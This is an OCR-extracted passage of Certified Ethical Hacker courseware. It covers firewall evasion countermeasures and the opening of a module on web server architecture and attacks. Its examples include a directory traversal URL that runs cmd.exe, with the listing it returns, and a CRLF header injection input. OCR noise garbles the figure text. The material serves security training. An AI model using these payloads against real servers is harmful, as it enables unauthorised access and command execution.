Employ a hybrid signature-based exploit protection technique that comprises of advanced statistical and behavioral based analysis techniques to prevent IDS evasion using zero-day exploit.
Module 12 Page 1765
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
How to Defend Against Firewall Evasion The firewallshould shouldbe filtered be configured intruder cut such that the IP address ofan
| 3 |
Run regular risk queries to identify vulnerable firewall rules
Set the firewall ruleset to denyall traffic and enable only theservices required
9 |
Monitor user access to firewalls and control who can modify the firewall configuration
If possible, create a unique user ID torun the firewall services instead of running the services using the administrator or root ID
10 | Specify the source and destination IP addresses as well as the ports
Configurea remote syslog server and apply strict measures to protectit from malicious users
11 | Notify the security policy administrator about firewall changesand document them
Monitor firewall logs at regular intervals and investigate all suspicious log entries found
12 | Control physicalaceess tothe firewall
By default, disable all FTP connections to or from thenetwork
13 | Take regular backups of the firewall ruleset and configuration files
Catalog and review all inbound and outbound traffic allowed
14
through the trenal
|
Schedule regular firewall security7 audits' AlRights Reserved. Reproduction i Strictly Prohibited
How to Defend Against Firewall Evasion =
The firewall should be configured filtered out.
such that the IP address of an intruder should
be
=
Set the firewall rule set to deny all traffic and enable only the services required.
=
If possible, create a unique user ID to run the firewall services instead of running the services using the administrator or root ID.
=
Configure a remote syslog server and apply strict measures to protect it from malicious
=
Monitor firewall logs at regular intervals and investigate all suspicious log entries.
=
By default, disable all FTP connections to or from the network.
=
Catalog and review all inbound and outbound traffic allowed through the firewall.
=
Run regular risk queries to identify vulnerable firewall rules.
=
Monitor user access to firewalls and control who can modify the firewall configuration.
=
Specify the source and destination IP addresses as well as the ports.
=
Notify the security policy administrator about firewall changes and document them.
=
Control physical access to the firewall.
=
Take regular backups of the firewall ruleset and configuration files.
=
Schedule regular firewall security audits.
=
Look for integrated HTTPS/TLS inspection to defend against evasions.
users.
Module 12 Page 1766
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
=
Use HTTP Evader to run automated testing for suspected firewall evasions.
=
Use application connections.
Module 12 Page 1767
identification
to
block
malicious
applications
from
any
outbound
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
Module Summary o
Q
inthis module, we have discussed the following: > IDS, IPS, firewall, and honeypot concepts and solutions Various techniques to bypass IDSs and firewalls > Various techniques to bypass NAC and endpoint security > Various IDS/Firewall evasion tools > How to detect and defeat honeypots »
We concluded with a detailed discussion on various countermeasures that should be
employed in order to prevent IDS/Firewall evasion attempts by threat actors
Q Inthe next module, we will discuss in detail how attackers, as well as ethical hackers and pen-testers, perform web server hacking to get valuable information such as credit card numbers and passwords is Stic Prohibited
Module Summary This module discussed different IDS, IPS, firewall, and honeypot concepts and solutions. It also described various techniques for bypassing IDS and firewalls. It also explained various techniques to bypass NAC and endpoint security. In addition, it illustrated various IDS/firewall evasion tools. Further, it explained how to detect and defeat honeypots. Finally, it ended with a detailed discussion of various countermeasures to be adopted to prevent IDS/Firewall evasion attempts by threat actors. In the next module, we will discuss in detail how attackers as well as ethical hackers and pen-
testers perform web server hacking to gain valuable information such as credit card numbers and passwords.
Module 12 Page 1768
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
C/EH
EC-Council MODULE
13
—_— HACKING WEB ——— SERVERS uy
—
=
;
I a
OFFICIAL CURRICULA
'
—_
-
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
CEH
o
o
LEARNING
OBJECTIVES
LO#01: Summarize Web Server Concepts
©
LO#04: Explain Web Server Attack Countermeasures
LO#02: Demonstrate Different Web Server Attacks
©
LO#05: Summarize Patch Management Concepts
LO#03: Explain Web Server Attack Methodology
Copyright © by
Learning Objectives Most organizations consider their web presence to be an extension of themselves. Organizations maintain websites associated with their business on the World Wide Web to establish their web presence. Web servers are a critical component of web infrastructure. A single vulnerability in web server configuration may lead to a security breach on websites. Therefore, web server security is critical to the normal functioning of an organization. At the end of this module, you will be able to do the following: =
Describe web server concepts
=
Perform various web server attacks
=
Describe web server attack methodology
=
Use different web server attack tools
=
Apply web server attack countermeasures
=
Use different web server security tools
=
Describe patch management concepts
Module 13 Page 1771
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
CEH LO#01: Summarize Web Server Concepts
Copyright © by
Web Server Concepts To understand web server hacking, it is essential to understand web server concepts, including what a web server is, how it functions, and other elements associated with it. This section provides a brief overview of a web server and its architecture. It will also explain common factors or mistakes that allow attackers to hack a web server. This section also describes the impact of attacks on web servers.
Module 13 Page 1772
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Hacking Web Servers
Web Server Operations ‘|@
CEH
Awebserver is a computer system that stores, processes, and delivers web pages
to clients via HTTP
ient-Server Web Server Operation
Components of a Web Server © Document Root: Stores critical HTML files related to the web pages of a domain name that will be served in response to the
Application DataStore
requests
© Server Root: Stores server's configuration, error, executable, and log files
rN
StaticData
i
Request
© Virtual Document Tree: Provides storage on a different machine or disk after the original diskis filled up
Servet Request
i ‘Application
Serviet Response
Web Container
© Virtual Hosting: Technique of hosting multiple domains or websites on the same server
Other Services
© Web Proxy: Proxy server that sits between the web client and web server to prevent IP blocking and maintain anonymity
| web cent | copyright © by
Jon ie Strictly Prohibited
Web Server Operations A web server is a computer system that stores, processes, and delivers web pages to global clients via the Hypertext Transfer Protocol (HTTP). In general, a client initiates a communication process through HTTP requests. When a client desires to access any resource such as web pages, photos, and videos, the client’s browser generates an HTTP request that is sent to the web server. Depending on the request, the web server collects the requested information/content from the data storage or application servers and responds to the client’s request with an appropriate HTTP response. If a web server cannot find the requested information, then it generates an error message.
Static Data Request
A
Static Data Response Vv
Application
Server
Servlet Response HTTP Request
: HTTP } Response
Web Container Other Services
Figure 13.1: Typical client-server communication in web server operation
Module 13 Page 1773
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Components of a Web Server
Aweb server consists of the following components: Document
Root
The document root is one of the root file directories of the web server that stores critical HTML files related to the web pages of a domain name, which will be sent in
response to requests.
For example, if the requested URL is www.certifiedhacker.com and the document root is named “certroot” and is stored in the directory /admin/web, then /admin/web/certroot is the document directory address. If the complete request is www.certifiedhacker.com/P-folio/index.html, the server will search for the file path /admin/web/certroot/P-folio/index.html. Server Root It is the top-level root directory under the directory tree in which the server's configuration and error, executable, and log files are stored. It consists of the code that implements the server. The server root, in general, consists of four files. One file is dedicated to the code that implements the server, while the other three are subdirectories, namely, -conf, -logs, and -cgi-bin, which are used for configuration information, logs, and executables, respectively. Virtual Document Tree A virtual document tree provides storage on a different machine or disk after the original disk becomes full. It is case-sensitive and can be used to provide object-level security. In the above example under document root, for a _ request of www.certifiedhacker.com/P-folio/index.html, the server can also search for the file path /admin/web/certroot/P-folio/index.html if the directory admin/web/certroot is stored in another disk.
Virtual Hosting It is a technique of hosting multiple domains or websites on the same server. This technique allows the sharing of resources among various servers. It is employed in largescale companies, in which company resources are intended to be accessed and managed globally. The following are the types of virtual hosting: o
Name-based hosting
o
Internet Protocol (IP)-based hosting
©
Port-based hosting
Module 13 Page 1774
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Hacking Web Servers
=
Web Proxy A proxy server is located between the web client and web server. Owing to the placement of web proxies, all requests from clients are passed on to the web server through the web proxies. They are used to prevent IP blocking and maintain anonymity.
Open-source Web Server Architecture Open-source web server architecture typically uses Linux, Apache, called the LAMP software bundle, as the principal components. The following architecture:
are
the
functions
of the
principal
components
MySQL,
and
in open-source
PHP, web
often server
=
Linux is the operating system (OS) of the web server and provides a secure platform
=
Apache
=
MySQL is a relational database used to store the content and configuration information of the web server
=
PHP is the application layer technology used to generate dynamic web content
response
is the component
of the web
Site Users
server that
handles
each
Site Admin
HTTP
request
and
Attacks
=pobs | 2h pod
4
Internet
Linux
:
File system
RNAN 4
z
Applications
beg cencennesl
Bg scccnsed
v
Apache
Pret
~
PHP
PUREE
.
2
Compiled Extension
Email
eeeeeeeeey
¥
mysql
4
FE
Figure 13.2: Functions of the principal components of the open-source web server architecture
Module 13 Page 1775
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
IIS Web Server Architecture The Internet Information Service (IIS) is a web server application developed by Microsoft for Windows. IIS for Windows Server is a flexible, secure, and easy-to-manage web server for hosting anything on the web. It supports HTTP, HTTP Secure (HTTPS), File Transfer Protocol (FTP), FTP Secure (FTPS), Simple Mail Transfer Protocol (SMTP), and Network News Transfer Protocol (NNTP). It has several components, including a protocol listener such as HTTP.sys and services such as the World Wide Web Publishing Service (WWW Service) and Windows Process Activation Service (WAS). Each component functions in application and web server roles. These functions may include listening to requests, managing processes, and reading configuration files. Client
Stack
Svchost.exe
¥
Windows Activation Service (WAS)
WWW Service External Apps
application hestconfia “
a
a
2,
a
ry i %
> 4 =
>
HTTP Protocol Stack (HTTP.SYS)
Application Pool
7""7"""""" ie
Web Server Core Begin request processing, authentication, authorization, cache resolution, handler
7 Modules Native Anonymous authentication, managed engine,IIS certificate mapping,
AppDomain
execution, release state, update cache, update log, and end request processing
document, HTTP cache, HTTP errors, and HTTP logging
Authenticsti ‘uthentication
mapping, handler pre-
static file, default
Managed Modules Forms
Figure 13.3: Components of the IIS web server architecture
Module 13 Page 1776
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Web Server Security Issues
CEH
‘@
Attackers usually target software vulnerabilities and configuration errors to compromise web servers
‘@
Network and OS level attacks can be well defended using proper network security measures such as firewalls, IDS, etc. However, web servers can be accessed from anywhere via the Internet, which renders them highly
vulnerable to attacks
Custom Web Applications
[},_Stack7
ry
Third-party Components ~~
9
Web Server
Open Source/Commercial Apache/Microsoft IIS
ySQl/Ms Sal
Database
Operating System £7
© windows/tinux/macos juter/Switch
Security
Impact of Web Server Attacks
Business Logic Flaws
IPs / IDS
© Compromise of user accounts @ Website defacement
© Secondary attacks from the website © Root access to other applications or
servers
©
=
Data tampering and data theft
© Reputational damage of the company
Web Server Security Issues A web server is a hardware/software application that hosts websites and makes them accessible over the Internet. A web server, along with a browser, successfully implements client-server model architecture. In this model, the web server plays the role of the server, and the browser acts as the client. To host websites, a web server stores the web pages of websites and delivers a particular web page upon request. Each web server has a domain name and an IP address associated with that domain name. A web server can host more than one website. Any computer can act as a web server if it has specific server software (a web server program) installed and is connected to the Internet.
Web servers are chosen based on their capability to handle server-side programming, security characteristics, publishing, search engines, and site-building tools. Apache, Microsoft IIS, Nginx, Google, and Tomcat are some of the most widely used web server software. An attacker usually targets vulnerabilities in the software component and configuration errors to compromise web servers.
a
Website 1
Internet
Web Server
Browser on User’s Computer
Website 2
Figure 13.4: Conceptual diagram of a web server: the user visits websites hosted on a web server
Module 13 Page 1777
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Organizations can defend most network-level and OS-level attacks by adopting network security measures such as firewalls, intrusion detection systems (IDSs), and intrusion prevention systems (IPSs) and by following security standards and guidelines. This forces attackers to turn their attention to web-server- and web-application-level attacks because a web server that hosts web applications is accessible from anywhere over the Internet. This makes web servers an attractive target. Poorly configured web servers can create vulnerabilities in even the most carefully designed firewall systems. Attackers can exploit poorly configured web servers with known vulnerabilities to compromise the security of web applications. Furthermore, web servers with known vulnerabilities can harm the security of an organization. As shown in below figure, organizational security includes seven levels from stack 1 to stack 7. Custom Web Applications
wf,
@>
Third-party Components
Stack 6
Database
7
Operating System
Security
e
Business Logic Flaws
8
Open Source/Commercial
Apache/Microsoft IIS
4
Stack 5
Web Server
Network
Stack 7
Stack 4
Be
Stacks
Oracle/MySQL/MS SQL
(0,0) Windows/Linux/macOS
ere
ray
—
Router/Switch
RR
IPS / IDS
Figure 13.5: Levels of organizational security
Common Goals behind Web Server Hacking Attackers perform web server attacks with certain goals in mind. These goals may be either technical or non-technical. For example, attackers may breach the security of a web server and steal sensitive information for financial gains or merely for the sake of curiosity. The following are some common goals of web server attacks: =
Stealing credit-card details or other sensitive credentials using phishing techniques
=
Integrating the server into a botnet to perform denial of service (DoS) or distributed DoS (DDoS) attacks
=
Compromising a database
=
Obtaining closed-source applications
=
Hiding and redirecting traffic
=
Escalating privileges
Some attacks are performed for personal reasons, rather than financial gains: =
For pure curiosity
Module 13 Page 1778
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
=
For completing a self-set intellectual challenge
=
For damaging the target organization’s reputation
Dangerous Security Flaws Affecting Web Server Security A web server configured by poorly trained system administrators may have security vulnerabilities. Inadequate knowledge, negligence, laziness, and inattentiveness toward security can pose the greatest threats to web server security. The following are some common oversights that make a web server vulnerable to attacks: =
Failing to update the web server with the latest patches
=
Using the same system administrator credentials everywhere
=
Allowing unrestricted internal and outbound traffic
=
Running unhardened applications and servers
Impact of Web Server Attacks Attackers can cause various kinds of damage to an organization by attacking a web server. The following are some of the types of damage that attackers can cause to a web server. =
Compromise of user accounts: Web server attacks mostly focus on compromising user accounts. If the attacker compromises a user account, they can gain a large amount of useful information. The attacker can use the compromised user account to launch further attacks on the web server.
=
Website defacement: Attackers can completely change the appearance of a website by replacing its original data. They deface the target website by changing the visuals and displaying different pages with messages of their own.
=
Secondary attacks from the website: An attacker who compromises a web server can use the server to launch further attacks on various websites or client systems.
=
Root access to other applications or server: Root access is the highest privilege level to log in to a server, irrespective of whether the server is a dedicated, semi-dedicated, or virtual private server. Attackers can perform any action once they attain root access to the server.
=
Data tampering: An attacker can alter or delete the data of a web server and even replace the data with malware to compromise users who connect to the web server.
=
Data theft: Data are among the primary assets of an organization. Attackers can attain access to sensitive data such as financial records, future plans, or the source code of a
program.
=
Damage reputation of the company: Web server attacks may expose the personal information of a company’s customers to the public, damaging the reputation of the company. Consequently, customers lose faith in the company and become afraid of sharing their personal details with the company.
Module 13 Page 1779
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Why are Web Servers Compromised?
clEH
Improper file and directory permissions
@ Unnecessary default, backup, or sample files
Server installation with default settings
© Misconfigurationsin web server, operating systems, and networks
Enabling of unnecessary services, . including content
management and remote administration
Bugs 8 in server software, OS, and web PP! applications
Security conflicts with business ease-of-use case
| Misconfigured SSL certificates and encryption settings
Lack of proper security policies, procedures, and maintenance
@ Administrative or debugging functions that are enabled or accessible on web servers
Improper authentication with external systems
© Use of self-signed certificates and default certificates
Default accounts having default passwords, or no passwords
© Not using dedicated server for web services
Why are Web Servers Compromised? There are inherent security risks associated with web servers, the local area networks (LANs) that host websites, and the end users who access these websites using browsers.
Webmaster's perspective: From a webmaster’s perspective, the greatest security concern is that a web server can expose the LAN or corporate intranet to threats posed by the Internet. These threats may be in the form of viruses, Trojans, attackers, or the
compromise of data. Bugs in software programs are often sources of security lapses. Web servers, which are large and complex devices, also have these inherent risks. In addition, the open architecture of web servers allows arbitrary scripts to run on the server side while responding to remote requests. Any Common Gateway Interface (CGI) script installed in the web server may contain bugs that are potential security holes. Network administrator's perspective: From a network administrator's perspective, a poorly configured web server causes potential holes in the LAN’s security. While the objective of the web server is to provide controlled access to the network, excess control
can
make
the web
almost
impossible
to use.
In an intranet
environment,
the
network administrator must configure the web server carefully so that legitimate users are recognized and authenticated, and groups of users are assigned distinct access privileges. End user’s perspective: Usually, the end user does not perceive any immediate threat, because surfing the web appears both safe and anonymous. However, active content, such as ActiveX controls and Java applets, make it possible for harmful applications, such as viruses, to invade the user’s system. In addition, active content from a website that is displayed by the user’s browser can be used as a conduit for malicious software to bypass the firewall system and permeate the LAN. Module 13 Page 1780
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
The following are some oversights that can compromise a web server: =
Improper file and directory permissions
=
Installing the server with default settings
=
Unnecessary services enabled, including content management and remote administration
=
Security conflicts with the business’ ease-of-use requirements
=
Lack of proper security policy, procedures, and maintenance
=
Improper authentication with external systems
=
Default accounts with default or no passwords
=
Unnecessary default, backup, or sample files
=
Misconfigurations in the web server, OS, and networks
=
Bugs in server software, OS, and web applications
=
Misconfigured Secure Sockets Layer (SSL) certificates and encryption settings
=
Administrative or debugging functions that are enabled or accessible on web servers
=
Use of self-signed certificates and default certificates
=
Not using dedicated server for web services
Module 13 Page 1781
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
CEH LO#02: Demonstrate Different Web Server Attacks
Copyright © by
Web Server Attacks An attacker can use many techniques to compromise a web server, such as DoS/DDoS, Domain Name System (DNS) server hijacking, DNS amplification, directory traversal, man in the middle (MITM)/sniffing, phishing, website defacement, web server misconfiguration, HTTP response splitting, web cache poisoning, Secure Shell (SSH) brute force, and web server password cracking. This section describes these attack techniques in detail.
Module 13 Page 1782
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
DNS Server Hijacking ‘@
clEH
Attacker compromises the DNS server and changes the DNSsettings so thatall the requests coming towards the target web
Attacker : P
server are redirected to his/her own malicious server
E Redirects user request to ‘the malicious website
‘compromises DNS server and changes the DNS settings DNS server checks the respective DNS
(3) mapping for the requested dom:
DNS Server (Target)
@
B
z
a .
Users (Victim)
Legitimate Site
DNS Server Hijacking The Domain Name System (DNS) resolves a domain name to its corresponding IP address. A user queries the DNS server with a domain name, and the DNS server responds with the corresponding IP address. In DNS server hijacking, an attacker compromises a DNS server and changes its mapping settings to redirect toward a rogue DNS server that would redirect the user’s requests to the attacker’s rogue server. Consequently, when the user enters a legitimate URL in a browser, the settings will redirect to the attacker’s fake site.
ser request to
Attacker
the malicious website
@ theseverance DNS settings =.
Fake Site
Compromises DNS
DNS server checks the respective DNS.
—
DNS Server (Target)
Users (Victim)
1] L]
Legitimate Site
Figure 13.6: DNS server hijacking
Module 13 Page 1783
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
DNS Amplification Attack ‘©
CE H
Attacker takes advantage of the DNS recursive method of DNS redirection to perform DNS amplification attacks
What is the IP Address of certifiedhacker.com? Please reply to my IP address
~~
User's PC
Here's the IP ‘Address of certifiedhacker.com
Where can find the IP Address of certifiedhacker.com?
ae
should have the answer
User's Primary DNS Server (Recursion Allowed)
Root Servers
Primary DNS Server of certifiedhacker.com ins)
Pan
What is the IP Address of
‘What is the IP Address of
certfiedhackercom?
certifiedhackercom?
Primary DNS Serverof
Recursive DNS Method
com NameSpace
certifiedhacker.com fon Is Sticty Prohibited
Copyright © by
DNS Amplification Attack (Cont’d)
CE H
|@ Attacker uses compromised PCs with spoofed IP addresses to amplify the DDoS attacks on victims’ DNS server by exploiting the DNS recursive method ‘Where can | find the IP Address
What isthe IP Addressof
e>| User'sa Primary DNS Servers
Sends signals to activate bots
.|
e
(Recursion Allowed) (Not authoritativefor
Root Servers
certifiedhacker.com)
ca:) .com NameSpace
should have the answer
Here is the IP Address of certifiedhacker.com
SS Primary DNS Server of certifiedhacker.com
Copyright © by
Here is the IP Address of certifiedhacker.com
SS Victim's Server Victim's IP Address Jon ie Strictly Prohibited
DNS Amplification Attack Recursive DNS query is a method of requesting DNS mapping. The query goes through servers recursively until it fails to find the specified domain name to IP address mapping.
Module 13 Page 1784
DNS
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
The following are the steps involved illustrated in the below figure. =
in processing
recursive
DNS
requests; these steps are
Step 1:
Users who desire to resolve a domain name to its corresponding IP address send a DNS query to the primary DNS server specified in its Transmission Control Protocol (TCP)/IP properties. =
Steps 2 to 7:
If the requested DNS mapping does not exist on the user’s primary DNS server, the server forwards the request to the root server. The root server forwards the request to the .com namespace, where the user can find DNS mappings. This process repeats recursively until the DNS mapping is resolved. =
Step 8: Ultimately, when the system finds the primary DNS server for the requested mapping, it generates a cache for the IP address in the user’s primary DNS server. What is the IP Address
DNS
Where can | find the
Hereis the IP Address of certifiedhacker.com
Ido not know but -com NameSpace should have the answer User's Primary DNS Server
(Recursion Allowed)
e
F
Primary DNS Server of
certifiedhacker.com
Primary DNS Server of certifiedhacker.com
.com NameSpace Figure 13.7: Recursive DNS query
Attackers exploit recursive DNS queries to perform a DNS amplification attack that results in
DDoS attacks on the victim’s DNS server.
The following are the steps involved in a DNS amplification attack; these steps are illustrated in
the below figure. =
Step 1: The attacker instructs compromised hosts (bots) to make DNS queries in the network.
=
Step 2: All the compromised hosts spoof the victim’s IP address and send DNS query requests to the primary DNS server configured in the victim’s TCP/IP settings.
Module 13 Page 1785
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers =
Exam 312-50 Certified Ethical Hacker
Steps 3 to 8:
If the requested DNS mapping does not exist on the victim’s primary DNS server, the server forwards the requests to the root server. The root server forwards the request to the .com or respective top-level domain (TLD) namespaces. This process repeats recursively until the victim’s primary DNS server resolves the DNS mapping request. =
Step 9:
After the primary DNS server finds the DNS mapping for the victim’s request, it sends a DNS mapping response to the victim’s IP address. This response goes to the victim because bots use the victim’s IP address. The replies to copious DNS mapping requests from the bots result in DDoS on the victim’s DNS server.
BES Sends signals to activate bots
e
a serene.
Botnet compromised PCs
4G
” ertifiedhacker com knows it
Attacker
Where can find the IP Address
What is the IP Address of
User's Primary DNS Servers |} (Recursion Allowed)
but com NameSpace should have the answer
|_ (Not authoritative for certifiedhacker.com)
Root Servers
E Address of 5 certifiedhacker.com
ine F com NameSpace
Primary DNS Server of certifiedhacker.com
im’s Server
Victim's IP Address
Figure 13.8: DNS amplification attack
Module 13 Page 1786
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Directory Traversal Attacks ‘@
Indirectory traversal attacks, attackers use the ../ (dot-dot-slash) sequence to access restricted directories
outside the web server root directory ‘@
Attackers can use the trial and error method to navigate outside the root directory and access sensitive information in the system
4 & http://server.com/scri i pts/..%5c../ Windows/ ‘System32/ wae cmd.exe?/c +dirtc:\
Volume in drive Chas no label, Volume Serial Number is D4SE-9FEE
Directory ofC:\ oa/or/z022 11:31am 04/28/2022 06:43PM 03/21/2022 03:10PM 04/27/2022 08:54PM 03/21/2022 03:10PM 04/11/2022 03:16 AM 04/25/2022 05:25 PM 03/07/2022 03:38 PM
(04/27/2022 09:36PM
1026.end 123 text. —_OAUTOEXEC.BAT CATALINA HOME OCONFIG:SYS Documentsand Settings Downloads Intel
om Qcomay domoate 2 Gino Brows Ses GO support
Program Files
(02/26/2022 02:36AM Snort 04/28/2022 09:50AM WINDOWS (04/25/2022 02:03PM 569,344 WinDump.exe (3) 570,368 bytes
Copyright © by
AlRights Reserved. Reproduction f Sty Prohibited
Directory Traversal Attacks An attacker may be able to perform a directory traversal attack owing to a vulnerability in the code of a web application. In addition, poorly patched or configured web server software can make the web server vulnerable to a directory traversal attack. The design of web servers limits public access to some extent. Directory traversal is the exploitation of HTTP through which attackers can access restricted directories and execute commands outside the web server’s root directory by manipulating a Uniform Resource Locator (URL). In directory traversal attacks, attackers use the dot-dot-slash (../) sequence to access restricted directories outside the web server’s root directory. Attackers can use the trial-anderror method to navigate outside the root directory and access sensitive information in the
system.
An attacker exploits the web server software (web server program) to perform directory traversal attacks. The attacker usually performs this attack with the help of a browser. A web server is vulnerable to this attack if it accepts input data from a browser without proper validation.
Module 13 Page 1787
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Servers
http://server.com/scri
pts/..%5c../Windows/ System32/cmd.exe?/c +dirtc:\
Exam 312-50 Certified Ethical Hacker
Volume in drive C has no label. Volume Serial Number is D4SE-SFEE Directory of C:\ (04/02/2022 11:31AM 1,024 rnd 0123:text 04/28/2022 06:43 PM 03/21/2022 03:10PM OAUTOEXEC.BAT
04/27/2022 08:54PM ‘CATALINA_HOME 03/21/2022 03:10PM OCONFIG.SYS Documents and Settings 04/11/2022 09:16 AM
(04/25/2022 05:25PM Downloads 03/07/2022 03:38 PM Intel 04/27/2022 09:36 PM Program Files
02/26/2022 02:36 AM Snort
04/28/2022 09:50 AM winoows (04/25/2022 02:03 PM 569,344 WinDump.exe 7File(s) _570,368bytes 13 Dir(s) 13,432,115,200bytes free
1B dowedoads 8 B images Brews B sorts B apport
Figure 13.9: Directory traversal attack
Module 13 Page 1788
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Website Defacement ‘@
Web defacement occurs when an
intruder maliciously alters the visual appearance of a web page
ss
veep
2eoe
ntpivaww.certiiednacker
verbose error messages
php.ini file display_error = on ignore repeated errors = Off
copyright © by
AlRights Reserved. Reproduction f Sty Prohibited
Web Server Misconfiguration Web server misconfiguration refers to the configuration weaknesses in web infrastructure that can be exploited to launch various attacks on web servers, such as directory traversal, server intrusion, and data theft. The following are some web server misconfigurations: =
Verbose debug/error messages
=
Anonymous or default users/passwords
=
Sample configuration and script files
=
Remote administration functions
=
Unnecessary services enabled
=
Misconfigured/default SSL certificates
An Example of a Web Server Misconfiguration “Keeping the server configuration secure requires vigilance” Project (OWASP)
—Open Web Application Security
Administrators who configure web servers improperly may leave serious loopholes in the web server, thereby providing an attacker the chance to exploit the misconfigured web server to compromise its security and obtain sensitive information. The vulnerabilities of improperly configured web servers may be related to configuration, applications, files, scripts, or web pages. An attacker searches for such vulnerable web servers to launch attacks. The misconfiguration of a web server provides the attacker a path to enter the target network of an organization. These loopholes in the server can also help an attacker bypass user
Module 13 Page 1791
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
authentication. Once detected, these problems can be easily exploited and may result in the total compromise of a website hosted on the target web server. As shown in the below figure, the configuration may allow anyone to view the server status page, which contains detailed information about the current use of the web server, including information about the current hosts and requests being processed.
SetHandler
server-status
Figure 13.11: Screenshot displaying the httpd.conf file on an Apache server As shown in the below figure, the configuration may give verbose error messages. display
error
=
On
log_errors = On error_log = syslog ignore_repeated_errors = Off Figure 13.12: Screenshot displaying the php.ini file
Module 13 Page 1792
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
HTTP Response-Splitting Attack |
|
.
HTTP response splitting attack involves adding header
1] response data into the input field so that the server splits the response into two responses
The attacker can control the first response to redirect the
CEH Input = Jason
|
HTTP/1.1200 OK Set-Cookie: author=Jason
Input = JasonTheHacker\r\nHTTP/1.1 200 OK\r\n
user to a malicious website whereas the other responses are discarded by the web browser
First Response (Controlled by Attacker) Set-Cookie: author=JasonTheHacker HTTP/1.1 200 OK
String author = request . getParameter (AUTHOR_PARAM) ; Cookie cookie = new Cookie("author",
Conall
author) ;
cookie. setMaxAge (cookieExpiration) ; response .addCookie (cookie) ;
lied
HTTP/1.1 200 OK Copyright €
HTTP Response-Splitting Attack An HTTP response-splitting attack is a web-based attack in which the attacker tricks the server by injecting new lines into response headers, along with arbitrary code. It involves adding header response data into the input field so that the server splits the response into two responses. This type of attack exploits vulnerabilities in input validation. Cross-site scripting XSS), cross-site request forgery (CSRF), and Structured Query Language (SQL) injection are examples of this type of attack. In this attack, the attacker controls the input parameter and cleverly constructs a request header that elicits two responses from the server. The attacker alters a single request to appear as two requests by adding header response data into the input field. The web server, in turn, responds to each request. The attacker can pass malicious data to a vulnerable application, and the application includes the data in an HTTP response header. The attacker can control the first response to redirect the user to a malicious website, whereas the web browser will discard other responses.
Module 13 Page 1793
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
